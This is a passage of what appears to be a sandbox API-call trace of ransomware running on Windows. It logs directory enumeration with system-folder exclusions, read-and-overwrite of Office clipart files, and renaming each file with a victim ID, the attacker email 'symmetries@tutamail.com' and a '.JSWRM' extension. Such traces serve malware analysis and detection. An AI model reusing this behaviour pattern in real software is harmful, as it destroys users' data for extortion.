lpString2="..") returned 1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2="...") returned 1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2="windows") returned -1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2="recovery") returned -1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2="perflogs") returned -1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2="documents and settings") returned 1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2="system volume information") returned -1 [0092.696] lstrcmpiW (lpString1="PARNT_09.MID", lpString2="msocache") returned 1 [0092.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_09.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_09.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_09.MID", lpUsedDefaultChar=0x0) returned 12 [0092.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_09.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_09.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_09.MID", lpUsedDefaultChar=0x0) returned 12 [0092.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.697] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6764) returned 1 [0092.697] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a60) returned 0x205850 [0092.697] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a60, lpOverlapped=0x0) returned 1 [0092.699] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.699] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a60, lpOverlapped=0x0) returned 1 [0092.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.699] CloseHandle (hObject=0x314) returned 1 [0092.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0092.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0092.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0092.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0092.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.700] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_09.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_09.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0092.701] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf74e1ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf74e1ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x100fdad1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1511, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PARNT_10.MID", cAlternateFileName="")) returned 1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2=".") returned 1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="..") returned 1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="...") returned 1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="windows") returned -1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="recovery") returned -1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="perflogs") returned -1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="documents and settings") returned 1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.701] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="system volume information") returned -1 [0092.702] lstrcmpiW (lpString1="PARNT_10.MID", lpString2="msocache") returned 1 [0092.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0092.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_10.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_10.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_10.MID", lpUsedDefaultChar=0x0) returned 12 [0092.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0092.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0092.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_10.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PARNT_10.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PARNT_10.MID", lpUsedDefaultChar=0x0) returned 12 [0092.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0092.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0092.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.702] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5393) returned 1 [0092.702] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1510) returned 0x205850 [0092.702] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1510, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1510, lpOverlapped=0x0) returned 1 [0092.704] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.705] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1510, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1510, lpOverlapped=0x0) returned 1 [0092.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.705] CloseHandle (hObject=0x314) returned 1 [0092.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0092.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0092.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0092.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0092.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0092.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0092.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0092.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0092.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.706] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x100fdad1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6140, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00013_.WMF", cAlternateFileName="")) returned 1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2=".") returned 1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="..") returned 1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="...") returned 1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="windows") returned -1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="recovery") returned -1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="perflogs") returned -1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="documents and settings") returned 1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="system volume information") returned -1 [0092.706] lstrcmpiW (lpString1="PE00013_.WMF", lpString2="msocache") returned 1 [0092.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00013_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00013_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00013_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00013_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00013_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00013_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0092.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.707] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=24896) returned 1 [0092.707] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6140) returned 0x24d210 [0092.707] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6140, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6140, lpOverlapped=0x0) returned 1 [0092.710] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.710] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6140, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6140, lpOverlapped=0x0) returned 1 [0092.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.710] CloseHandle (hObject=0x314) returned 1 [0092.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0092.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0092.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0092.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0092.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0092.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0092.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.711] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00013_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00013_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00013_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0092.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0092.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.711] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x100fdad1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x100fdad1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x100fdad1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x411a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00014_.WMF", cAlternateFileName="")) returned 1 [0092.711] lstrcmpiW (lpString1="PE00014_.WMF", lpString2=".") returned 1 [0092.711] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="..") returned 1 [0092.711] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="...") returned 1 [0092.711] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="windows") returned -1 [0092.712] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="recovery") returned -1 [0092.712] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="perflogs") returned -1 [0092.712] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="documents and settings") returned 1 [0092.712] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.712] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="system volume information") returned -1 [0092.712] lstrcmpiW (lpString1="PE00014_.WMF", lpString2="msocache") returned 1 [0092.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00014_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00014_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00014_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00014_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00014_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00014_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.712] HeapFree (in: hHeap=0x1e0000, 